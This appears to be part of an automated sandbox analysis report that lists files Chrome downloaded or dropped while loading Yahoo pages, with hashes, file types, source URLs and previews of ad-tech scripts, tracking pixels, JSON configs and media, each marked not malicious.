                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C........................... ."" ...$(4,$&1'..-=-157:::#+?D?8C49:7...C...........7%.%77777777777777777777777777777777777777777777777777..........."........................................B.........................!..1AQa."2q...BR..#..3CSbr..$&4....c..t..............................'........................!1.AQ..".23q.............?...Eh Q...S.@"7U. ..(.)."7@..A.2.b..nD. I.=S'.0H...O.."Zy..c.-.*...GWI.d...X...6,.S.r[.*h..._.....\...Hp..|.6F..A].......IK....g.(.$uc.Pq.N..e. ..z=O..jd....GE........5..1.O.xe...a0.dqv2...d....)"..E$.".......$........C..A$...H (...@..XG..$....@H..("..B.]Q.H.H., .g.a. Ct.I.B...$.I.R. 'vME.|"..-.Ha.RNi.SR....).).....nS.......7..".N.`...ik...cx..q..s.;,.=V...j.....2G..L....p.r.>....LQl.....yz.........J.a. ..V..&...FY.....BW.....T...b.p....98..Jt.9.z..+....SH...98X.....K...pik....{[.'...2}J.n...22.0y.....[.S..>a.<.....q.....2.Q...n.|..v.+.JjH.Uh.I$..PI..".T...tN=.S.*..E$.$.@....N .:;L5...'H.......|.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11650
                                                                                                                                                                                                                  Entropy (8bit):2.7004744665529308
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:A8AD2173031A12D8B84F6C328497B924
                                                                                                                                                                                                                  SHA1:6316AFD492E35FD4707AEC45C6168EE91DB6C5CA
                                                                                                                                                                                                                  SHA-256:99025C5580483E9C02039567732543BAC418DDABE227C46B92BE0C34773433C4
                                                                                                                                                                                                                  SHA-512:7782ABDE5B4347976E8362B4FEF0652AC48E1BFB8E538CD739EDDADFB93F1E793EDF99B0A9BA1E82126E85F3FF635864C32FCF4AD5D33A1389B888A484F788E4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{. "prebid": {. "adUnits": {. "us_ylogin_main_dt_full_screen": {. "pos": 1,. "formats": {. "banner": {. "sizes": [. [. 1440,. 1024. ]. ]. }. },. "bidders": {. "yahooPrebidServer": {},. "yahooAds": {},. "taboola": {}. }. }. },. "setConfig": {. "debug": false,. "enableSendAllBids": false,. "targetingControls": {. "alwaysIncludeDeals": true,. "allowTargetingKeys": [. "BIDDER",. "AD_ID",. "PRICE_BUCKET",. "SIZE",. "FORMAT",. "DEAL",.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (552)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):86143
                                                                                                                                                                                                                  Entropy (8bit):5.456561817569209
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:0103E9F52EF96B8BF7939EEBD681D92A
                                                                                                                                                                                                                  SHA1:3C7DE469CB144E200BF067650FB3A1A3053640A9
                                                                                                                                                                                                                  SHA-256:EB803B33E2BC6F51CB86B2F318B3850BDED63348CC585E8E4BA0AC59AF18C5F7
                                                                                                                                                                                                                  SHA-512:80AFAEEB3D14D8D067BF69BBCA978A4F6BAB071CC2D737323CF8981A31214131CD12EFC5DE63B78C39656C2AF7303569F152FE7DFE7F0E13F01B10836D88FD47
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://pm-widget.taboola.com/yahooweb-network/pmk-20220605.1.js
                                                                                                                                                                                                                  Preview:(function(){/*.. Perfect Market Widget Platform Library. Copyright (C) 2011 Perfect Market, Inc.. All Rights Reserved.. NO PERMISSION IS GRANTED TO COPY OR USE CODE EXCEPT AS IS . NECESSARY TO DISPLAY ADS IN THE NORMAL COURSE OF BROWSING A WEB SITE.. CONFIDENTIAL COPYRIGHTED AND PATENTED MATERIAL. US PATENTS 7,610,279 7,644,072 7,617,200 and 7,627,565. OTHER PATENTS PENDING.. DO NOT DECOMPILE OR REVERSE ENGINEER.*/.function m(){return function(){}}function q(b){return function(a){this[b]=a}}function s(b){return function(){return this[b]}}var _pmk=_pmk||{};window._pmk=_pmk;TBWidgetFacebook=function(){this.B="stp";this.name="facebook";this.Ma=!1;this.L=[];this.ia=[];this.Oi=this.pi=!1;this.zh=0;TBWidgetFacebook.prototype.k=m();TBWidgetFacebook.prototype.Ca=m();TBWidgetFacebook.prototype.yh=m();TBWidgetFacebook.prototype.P=function(){this.Ma=!0}};window.TBWidgetFacebook=TBWidgetFacebook;.TBVideoElem=function(b,a,c){this.Wd="none";this.rd=this.Qf="video";this.td="player-div";if(null!==b)
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):349312
                                                                                                                                                                                                                  Entropy (8bit):7.999489757142884
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:5368A6B104D1212CAC3D95C6A75AB006
                                                                                                                                                                                                                  SHA1:81EEF9ED88CDC29D0050D31D0939591D5F58314C
                                                                                                                                                                                                                  SHA-256:0C5BB8B61C8A537C8575CF84AD46947C39DB200312A581D2FA93E885B85479C9
                                                                                                                                                                                                                  SHA-512:258CB2E6AC62F989A8099E5AA0AB9297A9FD296729CDE860A095172B47B57D2C8DA09F89CBC4DF4FDB93CD716EB63008595D68025F54E3E76092B95101EE7345
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/media/v1/hls/v4/aes128/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/facdab7a-7629-4f80-9d4f-6355b5f33bd4/d9935f8c-bc8c-465d-90ed-e5c8188bebe4/3x/segment0.ts?akamai_token=exp=1728075383~acl=/media/v1/hls/v4/aes128/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/facdab7a-7629-4f80-9d4f-6355b5f33bd4/d9935f8c-bc8c-465d-90ed-e5c8188bebe4/*~hmac=f6d17b2dc7bcef0b4fb3783bee823758c72728898a1f26b5efe7a321daa821a2
                                                                                                                                                                                                                  Preview:....&.N...gi._.......?pWO.........x...7.....5./...n...P...........;.K...AI.L.F........[.RB.*.y..T.4."..-\.1;.:t4&...=4m.e"|5...b.i5..&..7T.M...i..0e.H....f.....d~d.A..pZC.$.V...q9._9....l..r]..b...%s....N..-..V.[....B./)g.D..l2....iD.eH...7lNy-?..i...f>.....l..|.7A.[..p+D...8.f..W...=.`..e.`..DGi...../.r..J..p.Pb. .......=..........PU.....O...c....J<Y7....6,.w....6.4...;....&.T...........L_.(z.*...".M.....-.g.>.4.M..../.F-hL..Vd...l.._.q0...v.A.tV...0.*..f...p.k..N...>.^.)AX..&&.hR.O....d..6...^x[Ie........Z:l.{...K.a..$8......bGI.#.uq.....3r..JC./..C.*.-5........'.8..Q....D.A15Du...u..{..?.9......q.g.$.\...._sz9.USW...<.....e...+....b]..x'..&..~........P..b..O!....|/.....k..M..z.......@....Pm..MZ.-q../....d..k....4{.}.]e...}...`..S$...F4=......6yg..2k.l...h.e...0...W..s..J..w...s!.,sO.i.(d.K.. . .....]p^........z}2.W..$H.-.x:..nj.J.}.\\O..h...l..Q.}..d,....l...b..-..?..YAz.....?cb9.A..ekdfuhg.l.5...*..."!]\..........Y..e..*Z.@
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7977), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):7977
                                                                                                                                                                                                                  Entropy (8bit):5.139495302416975
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:69D9917872FF1011BCB87D5044F6E12D
                                                                                                                                                                                                                  SHA1:DB61157780300B24416F639DF9FB24C5A0829516
                                                                                                                                                                                                                  SHA-256:F9F7F659C467019A4E8CA49A95810AFD7BAA0A791542C4041E0C0E828A86C18D
                                                                                                                                                                                                                  SHA-512:1F0B45E4D82F4A1BBC1CBBF6461DC069AC724D7FF1919839732CC94735034A958A40865A53F013700A3D7C3657217A199A8F8DCDAEB07BF586C1531253FCF2DE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-geolocation-1.3.0-modern.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-geolocation",[],t):"object"==typeof exports?exports["wafer-geolocation"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-geolocation"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(o[r])return o[r].exports;var n=o[r]={i:r,l:!1,exports:{}};return e[r].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,r){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                  Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C2196DE8BA412C60C22AB491AF7B1409
                                                                                                                                                                                                                  SHA1:5FBD472222FEB8A22CF5B8AA5DC5B8E13AF88E2B
                                                                                                                                                                                                                  SHA-256:6ADC3D4C1056996E4E8B765A62604C78B1F867CCEB3B15D0B9BEDB7C4857F992
                                                                                                                                                                                                                  SHA-512:84E24A70B78E9DE9C9D0DFEB49F3F4247DBC1C715D8844471EE40669270682E199D48F5FBEC62BD984C9C0270534B407C4D2561DD6C05ADEC3C83C1534F32D5C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://d5p.de17a.com/getuid/pubmatic?https://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTI3NDUmdGw9MTI5NjAw&gdpr=0&gdpr_consent=&piggybackCookie=$UID
                                                                                                                                                                                                                  Preview:GIF89a.............,...........D..;
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):2146
                                                                                                                                                                                                                  Entropy (8bit):4.423645601696178
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:9FAF9F0AF03805FD10E24FD7A54CA611
                                                                                                                                                                                                                  SHA1:08040307BA428BDE6AE12DA50273BA339F681AD6
                                                                                                                                                                                                                  SHA-256:F26B4A53465EBC250CF44D422A38CBE2D812476AEA4E9215485C16B888273EE8
                                                                                                                                                                                                                  SHA-512:FF7FA984E9B3C6397D0C258ADC6AD74229B7E72C80E25230220A197941F1B90E517C11145DACB3FEB0B89B3A49BDBE74EE7190DC7B123458A323693B8F5E267F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://www.yahoo.com/manifest_desktop_us.json
                                                                                                                                                                                                                  Preview:{. "background_color": "#ffffff",. "display": "standalone",. "gcm_user_visible_only": true,. "icons": [. {. "sizes": "48x48",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_48.png",. "type": "image/png". },. {. "sizes": "72x72",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_72.png",. "type": "image/png". },. {. "sizes": "96x96",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_96.png",. "type": "image/png". },. {. "sizes": "128x128",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_128.png",. "type": "image/png". },. {. "sizes": "144x144",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_144.png",. "type": "image/png". },. {.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65354)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):98590
                                                                                                                                                                                                                  Entropy (8bit):5.262081609860911
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:93C71F7FAF9DCA7767823C99109C81D3
                                                                                                                                                                                                                  SHA1:01E7B25914D48BB4DD3CD2E6F60CFCD99CAA10EF
                                                                                                                                                                                                                  SHA-256:66776998B10E583A72F8FD29391A50E2C80EB3BC9A65B0DAFE97E576D7D88507
                                                                                                                                                                                                                  SHA-512:3E02E2F714D1FB066FFD376FACFD936E75D01D6862D4F7FC353B1D0E725FE3294BBAAE85268DB46541AC7B55D44AC8721A685113FA0D8FD617B323D6DE768B7A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:// Hash: ioxxdjHDzFBt50jsKHcULoEjfPjn7FupHUObUXTEulH1iImcaT1OYYq4nXedv+v6ystL/mciw43eN2N1sBqukEcB1G3yLaozwAQoZarIvpe+op2I8dDWCrnmQL5aA3TRFA2hIGMEsGDPdljIfZlxPKB5Tt8rZMkwd8T+7UEJODk=.!function(e){"use strict";var n=function(e,t){return(n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var i in t)t.hasOwnProperty(i)&&(e[i]=t[i])})(e,t)};function t(e,t){function i(){this.constructor=e}n(e,t),e.prototype=null===t?Object.create(t):(i.prototype=t.prototype,new i)}var L=function(){return(L=Object.assign||function(e){for(var t,i=1,n=arguments.length;i<n;i++)for(var r in t=arguments[i])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function i(e,t){var i={};for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&t.indexOf(n)<0&&(i[n]=e[n]);if(null!=e&&"function"==typeof Object.getOwnPropertySymbols){var r=0;for(n=Object.getOwnPropertySymbols(e);r<n.length;r++)t.indexOf(n[r])<0&&Object.prototype.pro
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):7196
                                                                                                                                                                                                                  Entropy (8bit):7.852497012680718
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:45142D120C7F8245B8CC1B08CA218423
                                                                                                                                                                                                                  SHA1:68872A8DABE514AA9AE9BBD9ADE8841638357875
                                                                                                                                                                                                                  SHA-256:99E8611AA7C7260C9AC22E1C2F31BBF78C8FF6570A78A3EC3311F92B40242B8A
                                                                                                                                                                                                                  SHA-512:8A74C0AC11FEDA95A078335477F3CA149270BF2BDF3350F22A1A1939AC06FF3F39FAE8296EF6BABC9B6D4D33AD2D195E6369D2619DC2D5059CAE104E49CA8409
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/rtfBBfkdW9DKp8KPGEVsew--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_news_641/56a10f444275959855a00326c0112c72.cf.webp
                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X.... .........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .........*....>y<.I..........gC..2../n .:T.i..O...<..3..8=.w.q6k.?..=.=g.j.<0...k@.........Z..t.....'.Um..<`O...r..? c.UOi;....1L.:."...|"+!..0e.....*..._.......'b...M....bc........9....5].......8...N.....Z)/w.,-.(.V....k.A.y.(l....y=E....Rr..B......0........VtL..b_.,.r...SK..3...z..\....+..;..5I.......z.....N%.`.h9..e'....%.C.ym.......KL..G./l...}.......'._.MA...M.......J..}*.C.Bf{..T.......:ik..M..-.O.?..
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (27104)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):43638
                                                                                                                                                                                                                  Entropy (8bit):5.361148094990428
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C4F8F606E8D26E30B45D83965E4C0905
                                                                                                                                                                                                                  SHA1:F791F5B936EAC352D7F483A12450E6B9DD064772
                                                                                                                                                                                                                  SHA-256:27A7C1F2F2C7018314D78B422F71E0EDA4F6904F261E36D93956F65E308D82EA
                                                                                                                                                                                                                  SHA-512:11F3BB13686F77E0D40829826CC45A1E456978FFFCB0677FA16F1E1AE9C2A1558A2048FF376D9B486B5263D8572367FF2031F9A07F3DCAB152A69FF15D98EAC2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://eus.rubiconproject.com/usync.js
                                                                                                                                                                                                                  Preview:var comments = 'User-Sync: generated: 2024-09-25 20:33:51 PDT';.var rtb_sync = {"consent_rate":100,"reset_rate":0,"ttl":14,"sample":100,"max_pixels":16,"pixel_sets":{"rtb":{"sample":100,"pixels":{"1185":{"ttl":7,"img":"https:\/\/ad.turn.com\/r\/cs?pid=6","secure":{"img":"https:\/\/ad.turn.com\/r\/cs?pid=6"},"priority":7,"partner":"amobee"},"1902":{"priority":17,"ttl":2,"img":"https:\/\/cms.quantserve.com\/pixel\/p-e4m3Yko6bFYVc.gif?idmatch=0","secure":{"img":"https:\/\/cms.quantserve.com\/pixel\/p-e4m3Yko6bFYVc.gif?idmatch=0"},"partner":"quantcast"},"1986":{"priority":7,"ttl":1,"img":"https:\/\/ib.adnxs.com\/getuidnb?http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30","secure":{"img":"https:\/\/secure.adnxs.com\/getuidnb?https%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30"},"partner":"xandr"},"2046":{"priority":13,"ttl":7,"img":"https:\/\/token.rubiconproject.com\/token?pid=2046&pt=n&a=1",
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):388060
                                                                                                                                                                                                                  Entropy (8bit):5.539048397216447
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:0B47CE72A8BFF3B18A6F9BEE12EA3416
                                                                                                                                                                                                                  SHA1:A8D69E25641166428E3DD8BEDA5D7747AC21A2AE
                                                                                                                                                                                                                  SHA-256:BD895FF1E9BB3480606AE7C0F6A34BC069CFF8C11A7A1AB6DAFB94C6045816C8
                                                                                                                                                                                                                  SHA-512:842EF8B9D9BE1D8BE393D79A60196AC35CCC2E2DD45B763F0748DBB65E468BB7C7F0294444C972E718CC79DADDDB45AED2586AD42C4B0B5123AD91D8DC653AEC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"politics","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a0W00000LRNm8QAH;revsp:nbc_news_122;lpstaid:450dc40b-63a5-3d02-af4f-17313c93074f;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Donald_Trump;Jack_Smith_%28lawyer%29;United_States_Department_of_Justice;Tanya_Chutkan;Criminal_procedure;United_States_presidential_election;2020_United_States_presidential_election;Special_counsel;United_States_Attorney;Chuck_Rosenberg;Indictment;Supreme_Court_of_the_United_States\" ctopid=\"1996000\" hashtag=\"1996000\" rs=\"lmsid:a0a0W00000LRNm8QAH;revsp:nbc_news_122;lpstaid:450dc40b-63a5-3d02-af4f-17313c93074f;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"news","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=trump-claims-jack-smith-filing-194124013","canonicalSite":"news","canonicalUrl":"https://www.yahoo.com/news
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (1240)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1692
                                                                                                                                                                                                                  Entropy (8bit):5.608849358406249
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:1A947FF13E5CE78705B27C87363B470C
                                                                                                                                                                                                                  SHA1:A7FD9D722CB668E7156B02B31CA3258DDC204620
                                                                                                                                                                                                                  SHA-256:0AC516691F545DF5707A17395B73B39DC292C6B0233DA0A62E015D36283502A9
                                                                                                                                                                                                                  SHA-512:4E23E9ADD465FB988242E7B620C6359CAEB7A6FF672871A12F04918B11142E1AD1C76D3231C3568314556ED1604366A622F13075CB1653FF341971DB9845CD7D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<vmap:VMAP xmlns:vmap="http://www.iab.net/videosuite/vmap" version="1.0">..<vmap:AdBreak breakId="JllIEyvHFFfraLJR" breakType="linear" timeOffset="start">...<vmap:AdSource>....<vmap:VASTAdData>.....<VAST xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="3.0" xsi:noNamespaceSchemaLocation="oxml.xsd">......<Error><![CDATA[https://bats.video.yahoo.com/p?evt=ad_oppty&_E=ad_oppty&_V=V&V_sec=pb&_w=https%3A%2F%2Fwww.yahoo.com%2F&pver=1.9.1&aver=3.670.0&an=null&os=null&psz=401x226&expn=advstrmvideo&abid=null&s=2023538075&lang=en-US&lms_id=a0a6T00000R2KYJQA3&refid=null&intl=us&site=frontpage&bckt=Treatment_Oath_Player&paln=false&givn=false&rsz=0&pls=35b53262-b96b-4c4a-84ba-5d2a1c4febe4&vs=c3i31g7s&pstaid=f0262557-5186-3d6e-913d-df2cba992b2f&ar=1.77&cont=1&pltype=desktop&expb=TNBE003%2CUSNELT-ReactInRMP-commerce-ctrl-1004%2Cseamless&test=TNBE003%2CUSNELT-ReactInRMP-commerce-ctrl-1004%2Cseamless&mode=EVP&pt=home&pd=null&pct=null&
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):39516
                                                                                                                                                                                                                  Entropy (8bit):7.969015106153108
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:BA7DAC0FF5064AD8749B060663F88351
                                                                                                                                                                                                                  SHA1:E6D19E8E7788DC3EB24580CD7FAD75CBE1A223CD
                                                                                                                                                                                                                  SHA-256:376C700FE823D7059B7A60B575834913A7129FDEBCA6E91B1D514541D2861045
                                                                                                                                                                                                                  SHA-512:24293A20EA9B18D3B59E67D365E9C7CF6CA371ABAB6EBABF490A315C412B99D5FE25EC01D7E25DDABA4EAE880384171C3E4FA997D11633A951F3378BC19F0C13
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF.............C....................................................................C......................................................................................................................V.........................!..1A.Qa.."2q.....#BRb......$349Cr...Eet....%DSTdsu......c..................................6........................!1...A."Q#..2Baq$%354C..R...............?....Dc..>(P.C+...O;I.22A..)....A.E+..R!.IQ.()(.....~.....'q...!.....@...E,U.o.7U..2#lEC=..Y..0..zS..%C..+..$..D.. }j&...F..0.<G...gd+....Z......XDD..O...F*m&(.\[X.8..aaUrt/...zO...6;..(d.E..X..#....B..f........Q...F...j+...+#+..-..E..&8.9...\.....F..V.SPI..I...)N....Y.Z.R.NF2*...O.8..).U.].....H......GJ;.......9..!`.Tc.-A.M;kh.;..}.8..g......MS..b.)....(...(...(.P...P...@...@......f..R..@........f..8.....D.....P.g...<..f.........i...T.P.hb......#V.8.|.._g....d..'...#.I..TG&.-j&Wg..d.".....:.1.EIK.f..V.)..q(...3Q.GM.q.#rhm!...ri..M.CO.9H..5f#w....iD.j.".#...T.V...G;...r..O|..c
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):51141
                                                                                                                                                                                                                  Entropy (8bit):5.3656059346715415
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:3AD90205296656E070371A83D5201160
                                                                                                                                                                                                                  SHA1:2A9ABD973C356F4DFDC318BA3B7B1B45D304F0D6
                                                                                                                                                                                                                  SHA-256:322863EFDB222250F660A04127F8AC343CC74DED9EE6DEA49E88605C80F46EE1
                                                                                                                                                                                                                  SHA-512:4846D786A517EB1E91EAE0C4F824516C3C9CDD9FC4F9F8AC9A932CD830DB48A7E125F10C2580081A2CE2241B0DE5907C92421889FEFA753F475EF377E4DD018C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/ss/rapid-3.53.39.js
                                                                                                                                                                                                                  Preview:!function(){function le(l){var c={A1S:{log:!0,key:"_a1s"},B:{log:!1},BX:{log:!0,key:"bx"},WV:{log:!0,key:"_wv"},TT:{log:!1},D:{log:!1},_ga:{log:!0,key:"_ga"},yx:{log:!0,key:"_yx"},rxx:{log:!0,key:"_rx"},UNAUTHID:{log:!0,key:"aol_unauth"},_utd:{log:!0,key:"aol_utd",filter:function(e){e=e.match(/((?:\||^))gd#[^\|]+/g)[0].split("#")[1];return 24!==e.length&&console.warn("_utd value may be malformed"),e}},RSP_COOKIE:{log:!0,key:"aol_rsp",filter:function(e){e=e.match(/(?:(\&|^))sn=[^\&]+/g)[0].split("=")[1];return 24!==e.length&&console.warn("RSP_COOKIE value may be malformed"),e}},GUC:{log:!0,key:"_guc"},OTH:{log:!0,key:"_li",filter:function(){return"1"}}},u={};this.getCookieByName=function(e){return u[e]},this.setRxx=function(e){var o=-2,t=(document.domain||"").split("."),r=t.length;function a(e){return"."+t.slice(e).join(".")}function s(){var e,t=a(o),n="rxx",i=u[n];i||(e=(new Date).getTime()-14383872e5,i=parseInt(Math.random().toString().substring(2)).toString(36)+"."+e.toString(36)+"&v
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):2982
                                                                                                                                                                                                                  Entropy (8bit):5.422978858652074
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:4C296B0466A4238C6A74A2ADB0313D36
                                                                                                                                                                                                                  SHA1:9C386A54F6AA829458487CD6DDB06DD1B0B7FD2D
                                                                                                                                                                                                                  SHA-256:F9BBC1873697B7E3B9CBC1C1638B8CF22578EB3B6180A3078AF39597329BDEE1
                                                                                                                                                                                                                  SHA-512:FDD1DA74A1D7E247AE317F67F9839AFAE633D2F29EE895E1DBF7647713606367B3F071DDB481A2EEF887156E9CDF2313D0DC47E4D7241606D2C3598982C1C401
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
